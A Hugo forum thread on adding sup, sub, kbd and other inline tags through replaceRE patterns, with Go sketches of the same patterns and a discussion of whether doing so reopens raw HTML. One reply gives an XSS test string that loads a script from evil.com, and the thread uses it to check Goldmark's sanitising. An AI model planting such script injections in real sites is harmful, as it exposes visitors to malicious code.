Get missing inline HTML tags in Markdown without enabling HTML

Hi,

Goldmark has no Markdown syntax for several inline HTML tags. We could enable raw HTML to use them in Markdown, but that is a poor solution wherever security is a concern, e.g. for themes or larger projects with many contributors. The site configuration parameter unsafe should stay at its default, unsafe = false.

In the last few months, I’ve found the following replacements very useful for injecting some of the missing HTML tags after Goldmark has rendered the HTML. So far, they have not interfered with other Markdown elements, shortcodes or attributes. The syntax dates back to a suggestion @jmooring made somewhere in this forum.

Every element is surrounded by the curly braces { and }. A special ASCII sign after the first brace indicates the replacement.

  • {^1} → <sup>1</sup>
  • {_2} → <sub>2</sub>
  • {#Key} → <kbd>Key</kbd>
  • {$variable} → <var>variable</var>
  • {!highlight} → <mark>highlight</mark>
  • {=Author} → <cite>Author</cite>
  • {+inserted} → <ins>inserted</ins>

These substitutions can be applied with Hugo’s replaceRE. I chained them together in one partial, which is called with .Content as input: {{ partial "content.html" .Content }}.

content.html:

{{
.
| replaceRE `\{\^([^}]*)\}` "<sup>$1</sup>"
| replaceRE `\{\_([^}]*)\}` "<sub>$1</sub>"
| replaceRE `\{\#([^}]*)\}` "<kbd>$1</kbd>"
| replaceRE `\{\!([^}]*)\}` "<mark>$1</mark>"
| replaceRE `\{\=([^}]*)\}` "<cite>$1</cite>"
| replaceRE `\{\+([^}]*)\}` "<ins>$1</ins>"
| replaceRE `\{\$([^}]*)\}` "<var>$1</var>"
| safeHTML }}
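
For anyone who wants to try the patterns outside of Hugo, here is a minimal Go sketch of the same chain. It assumes that replaceRE behaves like Go's regexp ReplaceAllString for these patterns; the names inlineRule, rules and applyInlineTags are made up for this illustration and are not part of Hugo.

```go
package main

import (
	"fmt"
	"regexp"
)

// inlineRule pairs a marker pattern with its HTML replacement.
// (Hypothetical helper type, not part of Hugo.)
type inlineRule struct {
	pattern     *regexp.Regexp
	replacement string
}

// rules mirrors the replaceRE chain in content.html, in the same order.
var rules = []inlineRule{
	{regexp.MustCompile(`\{\^([^}]*)\}`), "<sup>$1</sup>"},
	{regexp.MustCompile(`\{\_([^}]*)\}`), "<sub>$1</sub>"},
	{regexp.MustCompile(`\{\#([^}]*)\}`), "<kbd>$1</kbd>"},
	{regexp.MustCompile(`\{\!([^}]*)\}`), "<mark>$1</mark>"},
	{regexp.MustCompile(`\{\=([^}]*)\}`), "<cite>$1</cite>"},
	{regexp.MustCompile(`\{\+([^}]*)\}`), "<ins>$1</ins>"},
	{regexp.MustCompile(`\{\$([^}]*)\}`), "<var>$1</var>"},
}

// applyInlineTags runs every rule over already-rendered HTML.
func applyInlineTags(rendered string) string {
	for _, r := range rules {
		rendered = r.pattern.ReplaceAllString(rendered, r.replacement)
	}
	return rendered
}

func main() {
	fmt.Println(applyInlineTags("<p>H{_2}O, press {#Ctrl}, E = mc{^2}</p>"))
}
```

Each pattern captures everything up to the first closing brace, so a marker cannot contain a } itself.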

Stay safe, :wink:
Georg

P.S.: After @salim pointed out a possible loophole in this approach, I changed the regex patterns to exclude angle brackets.

But this was not necessary, as the clarifying discussion here has shown. So the template is back to its original form, and now I understand better how it works.


Handy, thanks for the tip!

By relying on safeHTML like this, you’re essentially “enabling HTML”, I guess:

“It should not be used for HTML from a third-party, or HTML with unclosed tags or comments.”

I can use your substitution mechanism to insert arbitrary HTML:

{#<script src='https://evil.com'></script><script>nasty();</script>}

Wow, thanks, looks like you’re right. This is the opposite of what I hoped to achieve. But these replacements do not work without safeHTML. Maybe we need to enhance the regex to exclude angle brackets. Would that do the trick?

“Would that do the trick?”

I’m really no expert regarding XSS and stuff.

Generally, you should really know what you’re doing when declaring user input as safeHTML, i.e. sanitize it properly. I don’t know if simply blocking angle brackets is enough… I guess OWASP’s XSS Filter Evasion Cheat Sheet is a good starting point, see e.g. section Character Escape Sequences.

I played around a little more with these regular expressions and noticed something odd. Hugo already seems to filter all tags when evaluating replaceRE.

Did you test your script attack with a recent Hugo version? Because I can’t get a tag through when using my original regex code.

With this in site configuration[1]:

[markup.goldmark.renderer]
unsafe = true

This markdown:

{#<script src='https://evil.com'></script><script>nasty();</script>}

With your original regex code, produces:

<p><kbd><script src='https://evil.com'></script><script>nasty();</script></kbd></p>

With your new regex code, produces:

<p>{#<script src='https://evil.com'></script><script>nasty();</script>}</p>

[1] Never a good idea unless you completely trust content authors.
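
The two results above can be reproduced with a small Go sketch. The stricter pattern is not quoted in this thread, so kbdStrict below is only a guess at what "excluding angle brackets" could look like; wrapKbd is likewise a made-up helper name.

```go
package main

import (
	"fmt"
	"regexp"
)

var (
	// kbdOriginal is the <kbd> pattern from the original template.
	kbdOriginal = regexp.MustCompile(`\{\#([^}]*)\}`)
	// kbdStrict is an assumed variant that also rejects < and >
	// inside the braces (the thread does not show the real one).
	kbdStrict = regexp.MustCompile(`\{\#([^}<>]*)\}`)
)

// wrapKbd applies one <kbd> pattern to already-rendered HTML.
func wrapKbd(re *regexp.Regexp, rendered string) string {
	return re.ReplaceAllString(rendered, "<kbd>$1</kbd>")
}

func main() {
	// What Goldmark passes through when unsafe = true.
	payload := `<p>{#<script src='https://evil.com'></script><script>nasty();</script>}</p>`

	fmt.Println(wrapKbd(kbdOriginal, payload)) // script tags end up inside <kbd>
	fmt.Println(wrapKbd(kbdStrict, payload))   // no match, input is returned unchanged
}
```

Note that in both cases the script tags are still in the page, because Goldmark let them through; the stricter pattern only declines to wrap them.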


Thanks, @jmooring, I haven’t tested this before. These replacements are meant to be used with the default configuration unsafe = false. Maybe the template should check this setting and issue an error or a warning? It wouldn’t make much sense to use these replacements and also allow for raw HTML.

And I have a question now, concerning Hugo’s workflow:
My impression is that, with unsafe = false, Hugo applies its raw HTML check after all content has been rendered and every replaceRE has run. Is that right? If so, I could remove the check for angle brackets again and rely on Hugo’s security check. This works on my installation, but I don’t know how far back this feature goes.

The unsafe = true/false configuration value sets the value of the yuin/goldmark html.WithUnsafe renderer option. Any manipulation of .Content occurs after goldmark has rendered the markdown to HTML.


Thanks again, then the steps are the other way around. With unsafe = false (default) Goldmark omits all HTML tags before replaceRE does its work. And I can rely on that check.
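
To make the order of steps concrete, here is a rough Go sketch of the unsafe = false case. It does not call Goldmark; the string sanitized is hand-written and assumes that Goldmark replaces each raw tag with a "raw HTML omitted" comment before any replaceRE runs. The names omitted, kbdPattern and wrapKbdSafe are invented for this example.

```go
package main

import (
	"fmt"
	"regexp"
)

// omitted is the placeholder Goldmark is assumed to emit for each
// raw HTML tag when unsafe = false.
const omitted = "<!-- raw HTML omitted -->"

// kbdPattern is the <kbd> pattern from the original template.
var kbdPattern = regexp.MustCompile(`\{\#([^}]*)\}`)

// wrapKbdSafe applies the replacement to already-rendered HTML.
func wrapKbdSafe(rendered string) string {
	return kbdPattern.ReplaceAllString(rendered, "<kbd>$1</kbd>")
}

func main() {
	// Step 1 (assumed, hand-written): Goldmark has already dropped the
	// four raw tags of the attack string, leaving only the text between them.
	sanitized := "<p>{#" + omitted + omitted + omitted + "nasty();" + omitted + "}</p>"

	// Step 2: the replacement only ever sees the sanitized string.
	fmt.Println(wrapKbdSafe(sanitized))
}
```

The pattern still matches, but by then there is no script tag left to wrap, only placeholder comments and plain text.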

And with unsafe = true an attacker doesn’t need the replacements to embed script code; it can be placed anywhere, just like the inline tags. If raw HTML is enabled, these replacements are of no use.


Which is why, if a site or theme author is ever tempted to do this…

[markup.goldmark.renderer]
unsafe = true

…they should find another way.


I was following the discussion since I have used the cite option extensively in my pages in the last two days. So, good to know it is all good.

